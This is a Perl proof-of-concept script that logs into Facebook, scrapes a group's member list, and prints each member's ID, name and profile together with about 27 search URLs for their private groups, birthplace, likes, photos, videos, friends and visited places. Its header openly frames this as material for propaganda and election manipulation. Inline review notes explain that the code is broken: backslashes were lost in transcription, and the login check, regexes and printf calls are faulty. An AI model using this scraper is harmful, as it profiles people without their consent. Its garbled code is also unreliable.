#!/usr/bin/perl
#
# Facebook (facebug) 'Graph' Groups crosswalk user's
# metadata mapping weakness (Demo PoC)
#
#
# 2018 Todor Donev <todor.donev at gmail.com>
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg
#
# Description:
# A criminal hacker (cracker) can take advantage of
# this weakness by building a specialized database
# to manipulate people (Facebook users) with
# fake news, misinformation and propaganda, or to
# influence elections.
#
# See Also:
# https://en.wikipedia.org/wiki/Schema_crosswalk
#
# Disclaimer:
# These and previous programs are for educational
# purposes ONLY. Do not use them without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Requirements:
# cpan install HTTP::Cookies
# cpan install WWW::Mechanize
#
#
# I know it is buggy, but it is only a conceptual tool
# which demonstrates exploitation of this weakness.
#
#
# Facebook answer:
# Hi Todor,
#
# Thank you for contacting us. Unfortunately what
# you have described is not currently covered by
# this program. Please see
# https://www.facebook.com/data-abuse/terms/ for
# more information about what is currently in scope
# of this program. We will follow up with you
# regarding any questions we may have. For any other
# questions or concerns, please visit our Help Center:
# https://www.facebook.com/help.
#
# Thanks,
#
# Amber Serrano
# Developer Operations
#
# The Data Abuse Bounty is useless when this door is left
# wide open for criminal abuse.
#
# Now this weakness is patched..
#
# Buggy, Buggy, Buggy.. :)
#
use strict;
use WWW::Mechanize;
use HTTP::Cookies;
use open ':std', ':encoding(UTF-8)';

# Account used to log in before the group pages are fetched. Both values
# are hard-coded in cleartext, so anyone who can read this file gets the
# account; a throwaway account and restrictive file permissions are the
# minimum for a PoC like this.
my $un = ''; # facebook login
my $pw = ''; # facebook password
# Banner. NOTE(review): this listing appears to have lost its backslashes
# in transcription (no "\n" at the end of these strings, "x1bx5b" where
# "\x1b\x5b" ANSI colour escapes would be, "(w+)" instead of "(\w+)"),
# so several strings and patterns below do not behave as written.
print "Facebook (facebug) 'Graph' Groups crosswalk metadata mapping weakness (Demo PoC) ";
print "[ Website: https://ethical-hacker.org ";
print "[ Author: Todor Donev <todor.donev at gmail.com> ";
# Exactly one group id is accepted, although the loop further down walks
# all of @ARGV.
die "Usage: perl $0 <Group ID> " unless (scalar @ARGV)==1;
# Browser emulation: a fresh in-memory cookie jar (no file is given, so
# the session cookie is not persisted) and a preset desktop User-Agent.
my $mech = WWW::Mechanize->new();$mech->cookie_jar(HTTP::Cookies->new());
$mech->agent_alias('Linux Mozilla');
# Log in through the mobile site. The login page is requested over plain
# http://, and the credentials are then posted to whatever first form that
# unauthenticated response contains, so an on-path party could steer the
# submit target; the https endpoints below are only reached after this
# cleartext hop.
$mech->get("http://m.facebook.com/login.php");
$mech->submit_form(form_number => 1,fields =>{email=>$un,pass=>$pw});
# Intended as a "did the login succeed" check, but it cannot fire: `!`
# binds tighter than `=~`, so the page content is negated to "" before
# the match, and "" never matches. `$!` is the OS errno, not an HTTP
# error, so the message would be misleading too. Presumably
# `die "..." unless $mech->content() =~ /.../;` was meant.
die "Error: $! " if !$mech->content() =~ /post_form_id"svalue="(w+)"/;
# One group per argument (only one can reach here, see the usage check).
foreach my $gid (@ARGV){
$mech->get("https://m.facebook.com/browse/group/members/?id=$gid");
# Prints the page <title>. Two problems: the captured title is used as
# the printf FORMAT string, so any '%' in it is interpreted as a
# directive, and the pattern contains an unescaped '/' inside a
# '/'-delimited regex (probably another transcription casualty).
printf "$1 " if ($mech->content() =~ m/<title>(.*)</title>/g);
# Page through the member list in steps of 30 (presumably the page size
# of this endpoint), up to offset 100000.
for (my $j = 0; $j <= 100000; $j += 30){
$mech->get("https://m.facebook.com/browse/group/members/?id=$gid&start=$j&listType=list_general");
# Stop condition: either marker in the body ends the whole script (die),
# not just the current group. The '.' in the second pattern is unescaped
# and matches any character.
die "[ No results found [ [ ========================== " if (($mech->content() =~ m{Content Not Found}) or ($mech->content() =~ m{No results found.}));
# Screen-scrape with regexes: @profiles receives (href, display name)
# pairs, @userid the member ids. HTML-by-regex is brittle; any markup
# change silently yields no matches and the inner blocks are skipped.
if (my @profiles = ($mech->content() =~ m/<div><h3><a href="/(.*?)">(.*?)</a></h3>/g)){
if (my @userid = ($mech->content() =~ m/id="member_(.*?)">/g)){
# Two elements are shifted from @profiles for every one from @userid,
# and the loop runs while EITHER array is non-empty; if the counts
# disagree, the exhausted array yields undef and the lines below print
# it as an empty field.
while (@profiles || @userid) {
my $fburl = shift @profiles;
my $name = shift @profiles;
my $pid = shift @userid;
# Every line below calls printf with the interpolated string as the
# FORMAT and no arguments, so a '%' in $name or $fburl is interpreted
# as a directive; print is the correct call for pre-built strings.
printf "x1bx5b0;32m[x1bx5b0m User ID: x1bx5b0;35m $pid x1bx5b0m Name/Profile: x1bx5b1;36m $name x1bx5b0m x1bx5b1;31m=>x1bx5b0m https://www.facebook.com/x1bx5b0;36m$fburl x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Which facebook groups the person joined:x1bx5b0;33m https://www.facebook.com/search/$pid/groups x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Which private facebook groups the person joined:x1bx5b0;33m https://www.facebook.com/search/$pid/groups-privacy x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Where the person is bornd:x1bx5b0;33m https://www.facebook.com/search/$pid/users-birth-place x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Posts that the person commented on:x1bx5b0;33m https://www.facebook.com/search/$pid/stories-commented x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Posts that the person like:x1bx5b0;33m https://www.facebook.com/search/$pid/stories-liked x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m In which posts is this person tagged:x1bx5b0;33m https://www.facebook.com/search/$pid/stories-tagged x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Posts by the person:x1bx5b0;33m https://www.facebook.com/search/$pid/stories-by x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Photos maded by the person:x1bx5b0;33m https://www.facebook.com/search/$pid/photos-by x1bx5b0m ";
# The label on this line duplicates the "stories-liked" label above
# although the URL is the photos-in search (copy/paste slip).
printf "x1bx5b0;32m[x1bx5b0m Posts that the person like:x1bx5b0;33m https://www.facebook.com/search/$pid/photos-in x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Which photos does this person like:x1bx5b0;33m https://www.facebook.com/search/$pid/photos-liked x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Photos made of this person:x1bx5b0;33m https://www.facebook.com/search/$pid/photos-of x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m In which photos is this person tagged:x1bx5b0;33m https://www.facebook.com/search/$pid/photos-tagged x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m What photos did the person comment on:x1bx5b0;33m https://www.facebook.com/search/$pid/photos-commented x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m What photos did the friends upload:x1bx5b0;33m https://www.facebook.com/search/$pid/friends/photos-uploaded x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m What photos did the friends tagged:x1bx5b0;33m https://www.facebook.com/search/$pid/friends/photos-tagged x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m What photos maded by the person's friends:x1bx5b0;33m https://www.facebook.com/search/$pid/friends/photos-of x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Photos by the person's friends:x1bx5b0;33m https://www.facebook.com/search/$pid/friends/photos-by x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Videos made of this person:x1bx5b0;33m https://www.facebook.com/search/$pid/videos-of x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Videos maded by the person:x1bx5b0;33m https://www.facebook.com/search/$pid/videos-by x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m In which videos is this person:x1bx5b0;33m https://www.facebook.com/search/$pid/videos-in x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Which videos does this person like:x1bx5b0;33m https://www.facebook.com/search/$pid/videos-liked x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m In which videos is this person tagged:x1bx5b0;33m https://www.facebook.com/search/$pid/videos-tagged x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m What videos did the person comment on:x1bx5b0;33m https://www.facebook.com/search/$pid/videos-commented x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m What videos did the friends upload:x1bx5b0;33m https://www.facebook.com/search/$pid/friends/videos-uploaded x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m All visited places:x1bx5b0;33m https://www.facebook.com/search/$pid/places-visited x1bx5b0m ";
printf "x1bx5b0;32m[x1bx5b0m Which people are following:x1bx5b0;33m https://m.facebook.com/subscribe/lists/?id=$pid x1bx5b0m ";
# Record separator between members.
printf "x1bx5b0;32m[x1bx5b0m ";
} # while (@profiles || @userid)
} # if (@userid)
} # if (@profiles)
} # for ($j)
} # foreach $gid